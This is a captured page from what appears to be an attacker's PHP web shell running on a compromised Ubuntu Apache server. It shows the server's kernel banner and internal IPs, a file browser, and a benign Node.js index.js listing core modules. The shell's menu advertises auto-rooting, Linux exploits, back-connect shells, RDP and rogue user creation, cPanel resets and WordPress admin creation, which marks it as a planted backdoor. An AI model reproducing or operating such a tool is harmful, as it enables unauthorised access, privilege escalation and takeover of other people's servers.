Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
builtins /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.35
KB
-rw-r--r--
package.json
446
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict' var semver = require('semver') module.exports = function ({ version = process.version, experimental = false } = {}) { var coreModules = [ 'assert', 'buffer', 'child_process', 'cluster', 'console', 'constants', 'crypto', 'dgram', 'dns', 'domain', 'events', 'fs', 'http', 'https', 'module', 'net', 'os', 'path', 'punycode', 'querystring', 'readline', 'repl', 'stream', 'string_decoder', 'sys', 'timers', 'tls', 'tty', 'url', 'util', 'vm', 'zlib' ] if (semver.lt(version, '6.0.0')) coreModules.push('freelist') if (semver.gte(version, '1.0.0')) coreModules.push('v8') if (semver.gte(version, '1.1.0')) coreModules.push('process') if (semver.gte(version, '8.0.0')) coreModules.push('inspector') if (semver.gte(version, '8.1.0')) coreModules.push('async_hooks') if (semver.gte(version, '8.4.0')) coreModules.push('http2') if (semver.gte(version, '8.5.0')) coreModules.push('perf_hooks') if (semver.gte(version, '10.0.0')) coreModules.push('trace_events') if ( semver.gte(version, '10.5.0') && (experimental || semver.gte(version, '12.0.0')) ) { coreModules.push('worker_threads') } if (semver.gte(version, '12.16.0') && experimental) { coreModules.push('wasi') } return coreModules }
Close